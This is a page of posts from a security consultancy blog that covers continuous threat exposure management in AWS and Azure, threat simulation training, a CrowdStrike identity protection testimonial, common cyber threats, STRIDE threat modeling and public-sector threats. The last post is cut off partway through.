Mar 21 2024

HACK-PROOF YOUR CLOUD: THE STEP-BY-STEP CONTINUOUS THREAT EXPOSURE MANAGEMENT CTEM STRATEGY FOR AWS & AZURE

Continuous Threat Exposure Management (CTEM) is an evolving cybersecurity practice focused on identifying, assessing, prioritizing, and addressing security weaknesses and vulnerabilities in an organization’s digital assets and networks continuously. Unlike traditional approaches that might assess threats periodically, CTEM emphasizes a proactive, ongoing process of evaluation and mitigation to adapt to the rapidly changing threat landscape. Here’s a closer look at its key components:

  1. Identification: CTEM starts with the continuous identification of all digital assets within an organization’s environment, including on-premises systems, cloud services, and remote endpoints. It involves understanding what assets exist, where they are located, and their importance to the organization.
  2. Assessment: Regular and ongoing assessments of these assets are conducted to identify vulnerabilities, misconfigurations, and other security weaknesses. This process often utilizes automated scanning tools and threat intelligence to detect issues that could be exploited by attackers.
  3. Prioritization: Not all vulnerabilities pose the same level of risk. CTEM involves prioritizing these weaknesses based on their severity, the value of the affected assets, and the potential impact of an exploit. This helps organizations focus their efforts on the most critical issues first.
  4. Mitigation and Remediation: Once vulnerabilities are identified and prioritized, CTEM focuses on mitigating or remedying these issues. This can involve applying patches, changing configurations, or implementing other security measures to reduce the risk of exploitation.
  5. Continuous Improvement: CTEM is a cyclical process that feeds back into itself. The effectiveness of mitigation efforts is assessed, and the approach is refined over time to improve security posture continuously.

The goal of CTEM is to reduce the “attack surface” of an organization—minimizing the number of vulnerabilities that could be exploited by attackers and thereby reducing the organization’s overall risk. By continuously managing and reducing exposure to threats, organizations can better protect against breaches and cyber attacks.

CTEM VS. ALTERNATIVE APPROACHES

Continuous Threat Exposure Management (CTEM) represents a proactive and ongoing approach to managing cybersecurity risks, distinguishing itself from traditional, more reactive security practices. Understanding the differences between CTEM and alternative approaches can help organizations choose the best strategy for their specific needs and threat landscapes. Let’s compare CTEM with some of these alternative approaches:

1. CTEM VS. PERIODIC SECURITY ASSESSMENTS

  • Periodic Security Assessments typically involve scheduled audits or evaluations of an organization’s security posture at fixed intervals (e.g., quarterly or annually). This approach may fail to catch new vulnerabilities or threats that emerge between assessments, leaving organizations exposed for potentially long periods.
  • CTEM, on the other hand, emphasizes continuous monitoring and assessment of threats and vulnerabilities. It ensures that emerging threats can be identified and addressed in near real-time, greatly reducing the window of exposure.

2. CTEM VS. PENETRATION TESTING

  • Penetration Testing is a targeted approach where security professionals simulate cyber-attacks on a system to identify vulnerabilities. While valuable, penetration tests are typically conducted annually or semi-annually and might not uncover vulnerabilities introduced between tests.
  • CTEM complements penetration testing by continuously scanning for and identifying vulnerabilities, ensuring that new threats are addressed promptly and not just during the next scheduled test.

3. CTEM VS. INCIDENT RESPONSE PLANNING

  • Incident Response Planning focuses on preparing for, detecting, responding to, and recovering from cybersecurity incidents. It’s reactive by nature, kicking into gear after an incident has occurred.
  • CTEM works upstream of incident response by aiming to prevent incidents before they happen through continuous threat and vulnerability management. While incident response is a critical component of a comprehensive cybersecurity strategy, CTEM can reduce the likelihood and impact of incidents occurring in the first place.

4. CTEM VS. TRADITIONAL VULNERABILITY MANAGEMENT

  • Traditional Vulnerability Management involves identifying, classifying, remediating, and mitigating vulnerabilities within software and hardware. While it can be an ongoing process, it often lacks the continuous, real-time monitoring and prioritization framework of CTEM.
  • CTEM enhances traditional vulnerability management by integrating it into a continuous cycle that includes real-time detection, prioritization based on current threat intelligence, and immediate action to mitigate risks.

KEY ADVANTAGES OF CTEM

  • Real-Time Threat Intelligence: CTEM integrates the latest threat intelligence to ensure that the organization’s security measures are always ahead of potential threats.
  • Automation and Integration: By leveraging automation and integrating various security tools, CTEM can streamline the process of threat and vulnerability management, reducing the time from detection to remediation.
  • Risk-Based Prioritization: CTEM prioritizes vulnerabilities based on their potential impact on the organization, ensuring that resources are allocated effectively to address the most critical issues first.

CTEM offers a comprehensive and continuous approach to cybersecurity, focusing on reducing exposure to threats in a dynamic and ever-evolving threat landscape. While alternative approaches each have their place within an organization’s overall security strategy, integrating them with CTEM principles can provide a more resilient and responsive defense mechanism against cyber threats.

CTEM IN AWS

Implementing Continuous Threat Exposure Management (CTEM) within an AWS Cloud environment involves leveraging AWS services and tools, alongside third-party solutions and best practices, to continuously identify, assess, prioritize, and remediate vulnerabilities and threats. Here’s a detailed example of how CTEM can be applied in AWS:

1. IDENTIFICATION OF ASSETS

  • AWS Config: Use AWS Config to continuously monitor and record AWS resource configurations and changes, helping to identify which assets exist in your environment, their configurations, and their interdependencies.
  • AWS Resource Groups: Organize resources by applications, projects, or environments to simplify management and monitoring.

2. ASSESSMENT

  • Amazon Inspector: Automatically assess applications for vulnerabilities or deviations from best practices, especially important for EC2 instances and container-based applications.
  • AWS Security Hub: Aggregates security alerts and findings from various AWS services (like Amazon Inspector, Amazon GuardDuty, and IAM Access Analyzer) and supported third-party solutions to give a comprehensive view of your security and compliance status.

3. PRIORITIZATION

  • AWS Security Hub: Provides a consolidated view of security alerts and findings rated by severity, allowing you to prioritize issues based on their potential impact on your AWS environment.
  • Custom Lambda Functions: Create AWS Lambda functions to automate the analysis and prioritization process, using criteria specific to your organization’s risk tolerance and security posture.

4. MITIGATION AND REMEDIATION

  • AWS Systems Manager Patch Manager: Automate the process of patching managed instances with both security and non-security related updates.
  • CloudFormation Templates: Use AWS CloudFormation to enforce infrastructure configurations that meet your security standards. Quickly redeploy configurations if deviations are detected.
  • Amazon EventBridge and AWS Lambda: Automate responses to security findings. For example, if Security Hub detects a critical vulnerability, EventBridge can trigger a Lambda function to isolate affected instances or apply necessary patches.

5. CONTINUOUS IMPROVEMENT

  • AWS Well-Architected Tool: Regularly review your workloads against AWS best practices to identify areas for improvement.
  • Feedback Loop: Implement a feedback loop using AWS CloudWatch Logs and Amazon Elasticsearch Service to analyze logs and metrics for security insights, which can inform the continuous improvement of your CTEM processes.

IMPLEMENTING CTEM IN AWS: AN EXAMPLE SCENARIO

Imagine you’re managing a web application hosted on AWS. Here’s how CTEM comes to life:

  • Identification: Use AWS Config and Resource Groups to maintain an updated inventory of your EC2 instances, RDS databases, and S3 buckets critical to your application.
  • Assessment: Employ Amazon Inspector to regularly scan your EC2 instances for vulnerabilities and AWS Security Hub to assess your overall security posture across services.
  • Prioritization: Security Hub alerts you to a critical vulnerability in an EC2 instance running your application backend. It’s flagged as high priority due to its access to sensitive data.
  • Mitigation and Remediation: You automatically trigger a Lambda function through EventBridge based on the Security Hub finding, which isolates the affected EC2 instance and initiates a patching process via Systems Manager Patch Manager.
  • Continuous Improvement: Post-incident, you use the AWS Well-Architected Tool to evaluate your architecture. Insights gained lead to the implementation of stricter IAM policies and enhanced monitoring with CloudWatch and Elasticsearch for anomaly detection.

This cycle of identifying, assessing, prioritizing, mitigating, and continuously improving forms the core of CTEM in AWS, helping to ensure that your cloud environment remains secure against evolving threats.

CTEM IN AZURE

Implementing Continuous Threat Exposure Management (CTEM) in Azure involves utilizing a range of Azure services and features designed to continuously identify, assess, prioritize, and mitigate security risks. Below is a step-by-step example illustrating how an organization can apply CTEM principles within the Azure cloud environment:

STEP 1: ASSET IDENTIFICATION AND MANAGEMENT

  • Azure Resource Graph: Use Azure Resource Graph to query and visualize all resources across your Azure environment. This is crucial for understanding what assets you have, their configurations, and their interrelationships.
  • Azure Tags: Implement tagging strategies to categorize resources based on sensitivity, department, or environment. This aids in the prioritization process later on.

STEP 2: CONTINUOUS VULNERABILITY ASSESSMENT

  • Azure Security Center: Enable Azure Security Center (ASC) at the Standard tier to conduct continuous security assessments across your Azure resources. ASC provides security recommendations and assesses your resources for vulnerabilities and misconfigurations.
  • Azure Defender: Integrated into Azure Security Center, Azure Defender provides advanced threat protection for workloads running in Azure, including virtual machines, databases, and containers.

STEP 3: PRIORITIZATION OF RISKS

  • ASC Secure Score: Use the Secure Score in Azure Security Center as a metric to prioritize security recommendations based on their potential impact on your environment’s security posture.
  • Custom Logic with Azure Logic Apps: Develop custom workflows using Azure Logic Apps to prioritize alerts based on your organization’s specific criteria, such as asset sensitivity or compliance requirements.

STEP 4: AUTOMATED REMEDIATION

  • Azure Automation: Employ Azure Automation to run remediation scripts or configurations management across your Azure VMs and services. This can be used to automatically apply patches, update configurations, or manage access controls in response to identified vulnerabilities.
  • Azure Logic Apps: Trigger automated workflows in response to security alerts. For example, if Azure Security Center identifies an unprotected data storage, an Azure Logic App can automatically initiate a workflow to apply the necessary encryption settings.

STEP 5: CONTINUOUS MONITORING AND INCIDENT RESPONSE

  • Azure Monitor: Utilize Azure Monitor to collect, analyze, and act on telemetry data from your Azure resources. This includes logs, metrics, and alerts that can help you detect and respond to threats in real-time.
  • Azure Sentinel: Deploy Azure Sentinel, a cloud-native SIEM service, for a more comprehensive security information and event management solution. Sentinel can collect data across all users, devices, applications, and infrastructure, both on-premises and in multiple clouds.

STEP 6: CONTINUOUS IMPROVEMENT AND COMPLIANCE

  • Azure Policy: Implement Azure Policy to enforce organizational standards and to assess compliance at scale. Continuous evaluation of your configurations against these policies ensures compliance and guides ongoing improvement.
  • Feedback Loops: Establish feedback loops using the insights gained from Azure Monitor, Azure Security Center, and Azure Sentinel to refine and improve your security posture continuously.

EXAMPLE SCENARIO: SECURING A WEB APPLICATION IN AZURE

Let’s say you’re managing a web application hosted in Azure, utilizing Azure App Service for the web front end, Azure SQL Database for data storage, and Azure Blob Storage for unstructured data.

  • Identification: You catalog all resources related to the web application using Azure Resource Graph and apply tags based on sensitivity and function.
  • Assessment: Azure Security Center continuously assesses these resources for vulnerabilities, such as misconfigurations or outdated software.
  • Prioritization: Based on the Secure Score and custom logic in Azure Logic Apps, you prioritize a detected SQL injection vulnerability in Azure SQL Database as critical.
  • Mitigation: Azure Automation is triggered to isolate the affected database and apply a patch. Concurrently, Azure Logic Apps notifies the security team and logs the incident for review.
  • Monitoring: Azure Monitor and Azure Sentinel provide ongoing surveillance, detecting any unusual access patterns or potential breaches.
  • Improvement: Insights from the incident lead to a review and enhancement of the application’s code and a reinforcement of security policies through Azure Policy to prevent similar vulnerabilities in the future.

By following these steps and utilizing Azure’s comprehensive suite of security tools, organizations can implement an effective CTEM strategy that continuously protects against evolving cyber threats.

IMPLEMENTING CTEM IN CLOUD ENVIRONMENTS LIKE AWS AND AZURE

Implementing Continuous Threat Exposure Management (CTEM) in cloud environments like AWS and Azure involves a series of strategic steps, leveraging each platform’s unique tools and services. The approach combines best practices for security and compliance management, automation, and continuous monitoring. Here’s a guide to get started with CTEM in both AWS and Azure:

COMMON STEPS FOR BOTH AWS AND AZURE

  1. Understand Your Environment
    • Catalogue your cloud resources and services.
    • Understand the data flow and dependencies between your cloud assets.
  2. Define Your Security Policies and Objectives
    • Establish what your security baseline looks like.
    • Define key compliance requirements and security objectives.
  3. Integrate Continuous Monitoring Tools
    • Leverage cloud-native tools for threat detection, vulnerability assessment, and compliance monitoring.
    • Integrate third-party security tools if necessary for enhanced capabilities.
  4. Automate Security Responses
    • Implement automated responses to common threats and vulnerabilities.
    • Use cloud services to automate patch management and configuration adjustments.
  5. Continuously Assess and Refine
    • Regularly review security policies and controls.
    • Adjust based on new threats, technological advancements, and changes in the business environment.

IMPLEMENTING CTEM IN AWS

  1. Enable AWS Security Services
    • Utilize AWS Security Hub for a comprehensive view of your security state and to centralize and prioritize security alerts.
    • Use Amazon Inspector for automated security assessments to help find vulnerabilities or deviations from best practices.
    • Implement AWS Config to continuously monitor and record AWS resource configurations.
  2. Automate Response with AWS Lambda
    • Use AWS Lambda to automate responses to security findings, such as isolating compromised instances or automatically patching vulnerabilities.
  3. Leverage Amazon CloudWatch
    • Employ CloudWatch for monitoring and alerting based on specific metrics or logs that indicate potential security threats.

IMPLEMENTING CTEM IN AZURE

  1. Utilize Azure Security Tools
    • Activate Azure Security Center for continuous assessment and security recommendations. Use its advanced threat protection features to detect and mitigate threats.
    • Implement Azure Sentinel for SIEM (Security Information and Event Management) capabilities, integrating it with other Azure services for a comprehensive security analysis and threat detection.
  2. Automate with Azure Logic Apps
    • Use Azure Logic Apps to automate responses to security alerts, such as sending notifications or triggering remediation processes.
  3. Monitor with Azure Monitor
    • Leverage Azure Monitor to collect, analyze, and act on telemetry data from your Azure and on-premises environments, helping you detect and respond to threats in real-time.

BEST PRACTICES FOR BOTH ENVIRONMENTS

  • Continuous Compliance: Use policy-as-code to enforce and automate compliance standards across your cloud environments.
  • Identity and Access Management (IAM): Implement strict IAM policies to ensure least privilege access and utilize multi-factor authentication (MFA) for enhanced security.
  • Encrypt Data: Ensure data at rest and in transit is encrypted using the cloud providers’ encryption capabilities.
  • Educate Your Team: Regularly train your team on the latest cloud security best practices and the specific tools and services you are using.

Implementing CTEM in AWS and Azure requires a deep understanding of each cloud environment’s unique features and capabilities. By leveraging the right mix of tools and services, organizations can create a robust security posture that continuously identifies, assesses, and mitigates threats.

AWS Security

Azure Security

InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: AWS, AWS security, Azure, Azure Security, cloud security


Sep 25 2023

Hands-on threat simulations: Empower cybersecurity teams to confidently combat threats

Category: Threat detection,Threat Modelingdisc7 @ 11:37 am

With the rising number of cyber-attacks, organizations must make sure they are ready to defend themselves. That means equipping cybersecurity teams with sufficient skills to identify and effectively stop an attack in its tracks. Worryingly, only 17% of tech workers are completely confident in their cybersecurity skills, while 21% have no confidence at all. Given that 74% of data breaches are caused by human error, it is crucial that upskilling practices are in place.

One of the best ways to develop the necessary skills is through hands-on learning which allows employees to practice in a low-risk environment and better understand the methods used by cyber-attackers. This kind of experience is vital for security teams to be able to anticipate threats and capably protect the business.

The importance of testing security teams’ skills

Automated defense technologies are highly effective for commodity threats – those which are based on programs that are readily available and require no customization to launch an attack. But integrating AI/ML capabilities into security operations can generate a false sense of security. Attackers can still create the exact same program with millions of different file hashes or apply human ingenuity to evade known defenses.

Anti-virus is built on a massive signature-database-shaped house of cards that easily crumbles by changing text within programs. The same applies for network signatures, endpoint detection and response. There are certain behaviors that traditional defense technologies focus on, but ultimately, malware is just software. The more it can blend into common software activity, the less likely it is that an attack will be detected. And this is easier than it seems.

Security teams need easily replicable techniques to emulate threat scenarios to test their defense skills against the skill level of cyber-attackers. Testing is how businesses find out the cybersecurity teams’ skill level without waiting for a breach.

At least yearly, there should be a full red team assessment; the red team is made up of offensive security professionals whose role is to exploit the company’s vulnerabilities and overcome cybersecurity controls. But given attackers always operate in real time, there should be a weekly exercise for individual tactics, techniques and procedures (TTPs).

Start with the basics

Even the most advanced cyberattacks leverage basic techniques that have been around for years. Businesses need to focus on fully leveraging the tools they have to detect even the most basic of techniques and then move their way up to more advanced techniques from there. That will remove the most common threat from the equation first. This allows them time to identify and build the expertise and infrastructure required to be mature enough to defend against the most advanced or dangerous threats.

Anticipate the risk by using threat simulation learning models

One example of such an exercise is a blue team friendly attack simulation. The blue team here refers to security experts who are aware of the organization’s objectives and security strategy and are trying to defend and respond to attacks performed by the red team. One group poses as the opposing force, or in this case, cyber criminals, while testing the ability of the defenders to detect and protect against such attacks.

However, these types of simulations are performed on extensive cyber ranges that take a lot of time and effort to create, and don’t always accurately reflect the enterprise environment. In addition, it requires security teams to take several days off to play through the exercise. The quality of these simulations depends on the team that developed it and the complexity of the available cyber range resources. The rapid evolution of threats means that the work cyber teams do can have a short shelf life, as does the ability to properly prepare defenders.

Defenders need to be able to rapidly test against new tactics and techniques in their everyday environment. This allows them to quickly check the efficacy of their monitoring tools, as well as their people and processes, on an ongoing basis, that is accurate to current threats. This is important to the concept of ‘becoming the threat’. What cybersecurity teams really need is the ability to test individual tactics in their organization’s live environment, without the overhead of a full red team exercise.

Hone skills and build confidence through hands-on learning

Simulations are a good way to understand how to best defend and respond against different attacks and determine whether employees need to upskill. At its basic level, if the blue team wins, they can be confident when it comes to a cybersecurity threat. But if they lose, the organization still has work to improve their defense strategy.

When simulating various TTPs, you can categories them two ways. First by level of expertise required to perform the specific attack. Second, by the area, or type of data in which the attack should be detected.

The concept of defense in depth is that even if you miss one component of an attack, you can ideally catch others so that you can prevent the attackers achieving their goal. Measurement is based on the time it takes for a team to detect and respond to a particular TTP once launched, by category of the technique. Skill, process, and technology gaps can then be mapped by identifying where response times were low, or there was no response time at all.

Up to date skills central to staying ahead of the hackers

Cyber teams play a constant cat and mouse game to keep up with the evolving threat landscape. However, organizations can adopt specific practices to ensure teams have built in skills to defend against cyber-attacks and protect the business.

Providing employees with first-hand experiences of how a cyber-attack plays out can break down the barrier between the defender and the attacker to better understand the threat and anticipate the risks. This type of learning pathway is crucial for an organization who needs to know how well equipped their teams are for when a cyber-attack inevitably occurs. Only then can decisions be made to fill skills gaps with additional training or if their current level of expertise is enough to protect the business.

When it comes to cyber-attacks, security teams must act extremely quickly to minimize the impact in stressful environments. Hands-on threat simulations will arm cybersecurity experts with the skills and confidence necessary to react to a cyber-attack calmly and efficiently, whilst protecting the company’s sensitive data and avoiding costly damages.

CYBERSECURITY INCIDENT MANAGEMENT MASTERS GUIDE

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: CYBERSECURITY INCIDENT MANAGEMENT MASTERS GUIDE, threat simulations


Feb 09 2023

9 Ways a CISO Uses CrowdStrike for Identity Threat Protection

https://www.crowdstrike.com/blog/9-ways-a-public-sector-ciso-uses-crowdstrike-identity-threat-protection/

Identity isn’t a security problem — it’s the security problem. 

This was the takeaway from my recent meeting with a local government CISO in the Washington, D.C. area. Tasked with protecting infrastructure, including the fire and police departments, the CISO turned to CrowdStrike a year ago for endpoint and identity protection.

The CISO outlined the main challenge his team faced: the managed detection and response (MDR) solution in use at the time was unable to keep up with modern security demands. The tool didn’t deliver the speed or fidelity he needed. Nor did it provide remediation, leading to long delays between when the tool sent data to the management console and when his thinly stretched security team could investigate and triage alerts.

CrowdStrike Falcon® Complete solved these problems by providing a bundle of Falcon modules on AWS GovCloud, complete with a virtual team of experts to administer the technology and quickly eliminate threats.

“There’s a complete difference between our previous MDR and CrowdStrike Falcon Complete. One gives me work to do. The other tells me the work is done.” –CISO, A county in the Washington, D.C. area

Identity Is the New Perimeter

Of everything the CISO shared, it was the identity piece that really stood out to me. According to the CrowdStrike 2022 Global Threat Report, nearly 80% of cyberattacks leveraged compromised credentials — a trend the county sees regularly, he said. 

With Falcon Complete, the CISO gets CrowdStrike Falcon® Identity Threat Protection to stop identity-based attacks, both through services performed by CrowdStrike and via work done by his security operations center (SOC) team.

Check out this live attack and defend demo by the Falcon Complete team to see Falcon Identity Threat Protection in action.

Below are nine use cases for the identity protection capability, in his own words.

1. We receive executive-level key metrics on identity risks. Falcon Identity Threat Protection provides us immediate value with real-time metrics on total compromised passwords, stale accounts and privileged accounts. As these numbers decrease, our risk and expenditures drop as well, allowing us to prove the value of our cybersecurity investments to stakeholders.

2. We get powerful policies and analytics. Falcon Identity Threat Protection helped us move away from reactive, once-a-year privileged account analysis to proactive real-time analysis of all of our identities, including protocol usage such as Remote Desktop Protocol (RDP) to DCs/critical servers. Many attacks leverage compromised stale accounts, and with Falcon Identity Threat Protection we can monitor and be alerted to stale accounts that become active.

3. We can stop malicious authentications. With Falcon Identity Threat Protection, we can enforce frictionless, risk-based multifactor authentication (MFA) when a privileged user remotely connects to a server — stopping adversaries trying to move laterally. Additionally, we can define policies to reset passwords or block/challenge an authentication from stale or high-risk accounts.

“I’ve bought a lot of cyber tools. My analysts unanimously thanked me the day we bought CrowdStrike.”

4. We can alert system admins to critical issues. Adversaries often target critical accounts. Instead of simply alerting the security team, Falcon Identity Threat Protection allows us to flag critical accounts with specific policies and alerts that can be sent directly to the account owner. For example, the owner of a critical admin account for our organization’s financial systems can be alerted to anomalous behavior around that account, eliminating the need for the security team to reach out to her for every alert.

5. We can investigate behavior and hygiene issues. When reviewing RDP sessions from the last 24 hours, we noticed a former employee, Steve Smith (names changed), remotely accessing a server in our environment from Jane Doe’s computer. Upon investigation, we found Jane Doe was legitimately using Steve Smith’s credentials to perform business functions that Steve was no longer around to perform. We immediately tied Jane’s account to Steve’s to trigger MFA for any authentication. We also reviewed Steve’s permissions and noticed he had extensive local administrator privileges to over 600 computers, which we were able to remove instantly.

6. We can eliminate attack paths to critical accounts. It takes only one user’s credentials to compromise your organization. In previous phishing campaigns that asked users to reset their passwords, 7% of our employees entered their username and password into a fake Microsoft login screen. Falcon Identity Threat Protection shows us how one username and password dump from a single machine can lead to the compromise of a highly privileged account, allowing for full, unfettered access to an enterprise network. We now have the ability to visualize how a low-level account compromise can lead to a full-scale breach.

“Within two hours of deploying Falcon Identity Threat Protection, we identified 10 privileged accounts with compromised passwords and began resetting them immediately.”

7. We gain awareness of AD incidents. With Falcon Identity Threat Protection, we can now see credential scanning and password attacks on all of our external-facing systems that link to our Microsoft AD and Azure AD logins.

8. We can verify if lockouts are actually malicious. Every day, we face a handful of account lockouts, mostly due to users forgetting their passwords or a system that continues to authenticate after the user has reset their password. With Falcon Identity Threat Protection, we can see all account lockouts and failed authentications, allowing us to immediately understand why a lockout occurred and if malicious activity was involved.

9. We can correlate endpoint and identity activity. Once an alert fires off regarding a potentially misused identity, such as a stale account becoming active after 90+ days of inactivity, we can correlate this information with endpoint-related detections. We simply grab the hostname where the stale account became active, pivot to CrowdStrike Falcon® Insight XDR, and look for malicious activity and detections on a specific machine. Likewise, if a machine becomes infected, we can use Falcon Identity Threat Protection to investigate who has access to that machine and whether their behavior is normal. This integration is not only unique but essential with identity-based attacks.

“CrowdStrike not only revolutionized the way our SOC operates, it changed the way I sleep at night.”

Tags: CrowdStrike, Threat Protection


Nov 14 2022

Top cybersecurity threats for 2023

Abstract Vector Red Background. Malware, or Hack Attack Concept

Going into 2023, cybersecurity is still topping the list of CIO concerns. This comes as no surprise. In the first half of 2022, there were 2.8 billion worldwide malware attacks and 236.1 ransomware attacks. By year end 2022, it is expected that six billion phishing attacks will have been launched.

SEE: Password breach: Why pop culture and passwords don’t mix (free PDF) (TechRepublic)

Here are eight top security threats that IT is likely to see in 2023.

Top 8 security threats for next year

1. Malware

Malware is malicious software that is injected into networks and systems with the intention of causing disruption to computers, servers, workstations and networks. Malware can extract confidential information, deny service and gain access to systems.

IT departments use security software and firewalls to monitor and intercept malware before it gains entry to networks and systems, but malware bad actors continue to evolve ways to elude these defenses. That makes maintaining current updates to security software and firewalls essential.

2. Ransomware

Ransomware is a type of malware. It blocks access to a system or threatens to publish proprietary information. Ransomware perpetrators demand that their victim companies pay them cash ransoms to unlock systems or return information.

So far in 2022, ransomware attacks on companies are 33% higher than they were in 2021. Many companies agree to pay ransoms to get their systems back, only to be hit again by the same ransomware perpetrators.

Ransomware attacks are costly. They can damage company reputations. Many times ransomware can enter a corporate network through a channel that is open with a vendor or a supplier that has weaker security on its network.

One step companies can take is to audit the security measures that their suppliers and vendors use to ensure that the end-to-end supply chain is secure.

3. Phishing

Almost everyone has received a suspicious email, or worse yet, an email that appears to be legitimate and from a trusted party but isn’t. This email trickery is known as phishing.

Phishing is a major threat to companies because it is easy for unsuspecting employees to open bogus emails and unleash viruses. Employee training on how to recognize phony emails, report them and never open them can really help. IT should team with HR to ensure that sound email habits are taught.

4. IoT

In 2020, 61% of companies were using IoT, and this percentage only continues to increase. With the expansion of IoT, security risks also grow. IoT vendors are notorious for implementing little to no security on their devices. IT can combat this threat by vetting IoT vendors upfront in the RFP process for security and by resetting IoT security defaults on devices so they conform to corporate standards.

If your organization is looking for more guidance on IoT security, the experts at TechRepublic Premium have put together an ebook for IT leaders that is filled with what to look out for and strategies to deal with threats.

5. Internal employees

Disgruntled employees can sabotage networks or make off with intellectual property and proprietary information, and employees who practice poor security habits can inadvertently share passwords and leave equipment unprotected. This is why there has been an uptick in the number of companies that use social engineering audits to check how well employee security policies and procedures are working. In 2023, social engineering audits will continue to be used so IT can check the robustness of its workforce security policies and practices.

6. Data poisoning

An IBM 2022 study found that 35% of companies were using AI in their business and 42% were exploring it. Artificial intelligence is going to open up new possibilities for companies in every industry. Unfortunately, the bad actors know this, too.

Cases of data poisoning in AI systems have started to appear. In a data poisoning, a malicious actor finds a way to inject corrupted data into an AI system that will skew the results of an AI inquiry, potentially returning an AI result to company decision makers that is false.

Data poisoning is a new attack vector into corporate systems. One way to protect against it is to continuously monitor your AI results. If you suddenly see a system trending significantly away from what it has revealed in the past, it’s time to look at the integrity of the data.

7. New technology

Organizations are adopting new technology like biometrics. These technologies yield enormous benefits, but they also introduce new security risks since IT has limited experience with them. One step IT can take is to carefully vet each new technology and its vendors before signing a purchase agreement.

8. Multi-layer security

How much security is enough? If you’ve firewalled your network, installed security monitoring and interception software, secured your servers, issued multi-factor identification sign-ons to employees and implemented data encryption, but you forgot to lock physical facilities containing servers or to install the latest security updates on smartphones, are you covered?

There are many layers of security that IT must batten down and monitor. IT can tighten up security by creating a checklist for every security breach point in a workflow.

Facing Cyber Threats Head On: Protecting Yourself and Your Business

Tags: cyber threats


Oct 15 2022

STRIDE covers threats to the CIA

Category: Information Security,Threat ModelingDISC @ 12:53 pm

I’ve been meaning to talk more about what I actually do, which is help the teams within Microsoft who are threat modeling (for our boxed software) to do their jobs better.  Better means faster, cheaper or more effectively.  There are good reasons to optimize for different points on that spectrum (of better/faster/cheaper) at different times in different products.   One of the things that I’ve learned is that we ask a lot of developers, testers, and PMs here.  They all have some exposure to security, but terms that I’ve been using for years are often new to them.

Larry Osterman is a longtime MS veteran, currently working in Windows audio.  He’s been a threat modeling advocate for years, and has been blogging a lot about our new processes, and describes in great detail the STRIDE per element process.   His recent posts are “Threat Modeling, Once Again,” “Threat modeling again. Drawing the diagram,” “Threat Modeling Again: STRIDE,” “Threat modeling again, STRIDE mitigations,” “Threat modeling again, what does STRIDE have to do with threat modeling,” “Threat modeling again, STRIDE per element,” “Threat modeling again, threat modeling playsound.”

I wanted to chime in and offer up this handy chart that we use.  It’s part of how we teach people to go from a diagram to a set of threats.  We used to ask them to brainstorm, and have discovered that that works a lot better with some structure.

Source:

Threat Modeling for security

Tags: STRIDE Chart, Threat modeling


Oct 11 2022

Top Cybersecurity Threats for Public Sector

An IRONSCALES survey published in October 2021 shows over 80% of respondents experienced an increase in email phishing attacks since the start of the pandemic.

Phishing involves the utilization of legitimate-looking emails to steal the login credentials or other sensitive information of a target organization. While it’s just as much a risk for small and medium-sized businesses, in the public sector, phishing attacks could potentially be nation-state sponsored, making it a possible double whammy.

While taking advantage of the latest and greatest software to protect yourself from top cybersecurity threats is par for the course, what makes phishing so pernicious is that it relies on human error. With phishing emails looking more authentic than ever, they are harder to catch.

Distributed Denial of Service (DDoS) Attacks

A recent report says ransom DDoS attacks increased 29% year over year and 175% quarter over quarter in quarter four of 2021. Some of the biggest targets were the public sector, schools, travel organizations, and credit unions.

DDoS attacks are known to bring down some of the largest websites and are quite difficult to prevent. They are considered by some to be the most “powerful weapon” on the internet, easily making DDoS attacks one of the top cyber security threats to the government.

DDoS attacks can happen at any time, affect any part of a website, and disrupt and interrupt services, usually leading to massive financial damage.

Nation-State Sponsored Cyber Attacks

With mainstream media daily broadcasting events as they are occurring to every channel imaginable (cable TV, smartphones, social media, etc.) cyber warfare has become an increasingly common way to launch disinformation campaigns, perform cyber espionage or terrorism, and even cyber-sabotage targets.

Nation-state-sponsored cyber attacks aim to

  • Hinder communication
  • Gather intelligence
  • Steal intellectual property
  • Damage to digital and physical infrastructure

They are even used for financial gain.

Though cyber attacks are sometimes used in tandem with real life attacks, what makes cyber warfare especially challenging is that it happens virtually and often covertly. There usually isn’t any declaration of war. That makes it difficult to prove who is responsible for the attack.

Ransomware

Ransomware attacks may not be an emerging trend by any means. They may not even be anything new. But they do have a history of wreaking havoc on the public sector and therefore need to be taken seriously.

Rewind to 2019 when the U.S. was hit by an unrelenting barrage of ransomware attacks that ultimately affected at least 966 government agencies, educational establishments, and healthcare providers to $7.5 billion (Emsisoft).

These attacks resulted in 911 services being interrupted, surveillance systems going offline, badge scanners and building access systems not working, websites going down, extended tax payment deadlines, and much more.

The threat of ransomware attacks still looms today and is no less a concern in 2022 than they were in 2019. As far as cyber security threats to the government are concerned, ransomware attacks should be kept on the cybersecurity radar.

What The Public Sector Can Do to Stay Ahead?

Beyond taking full advantage of the latest tech, for the public sector to stay ahead of cyber security in the public sector, you have to create a culture of cybersecurity within your organizations, offering ongoing training to their teams.

You need to secure all infrastructure, including cloud, mobile, and Internet of Things (IoT). You also want to improve compromise detection and be fully prepared for any attack. Plans should be documented and practiced regularly, so detection and response are immediate.

Conclusion

The top cybersecurity threats are generally a consequence of new technologies the public sector is either looking to implement or is already implementing. It is harder to know all the variables and potential vulnerabilities with anything new.

This isn’t to suggest that old technologies are more reliable, however. Like antivirus software, the virus definitions must be continually updated for the software to remain effective. The public sector needs to stay on the cutting edge of best practices.

The public sector must also remain agile in adapting to new threats, whether offering ongoing cybersecurity training, hiring skilled consultants to keep their new technological infrastructures in check, partnering with experienced cybersecurity service providers like Indusface, or otherwise.

Top Cybersecurity Threats for Public Sector

DISC InfoSec

#InfoSecTools and #InfoSectraining

#InfoSecLatestTitles

#InfoSecServices

Follow DISC #InfoSec blog

Ask DISC an InfoSec & compliance related question

Tags: Cybersecurity Threats


Oct 06 2022

Top Cybersecurity Threats for Public Sector

In the private sector, hackers and cybercriminals are prone to leaving organizations with good security infrastructures alone. Because they often go after low-hanging fruit, hacking into a well-protected network is perceived as more trouble than it’s worth.

But the public sector is a different matter entirely. The government and government agencies have access to assets and data that criminals would love to get their hands on, even with the added trouble. So, even though the public sector is well protected, it will not stop cybercriminals from attempting to break in.

The top cybersecurity threats for the public sector are as follows.

Phishing

An IRONSCALES survey published in October 2021 shows over 80% of respondents experienced an increase in email phishing attacks since the start of the pandemic.

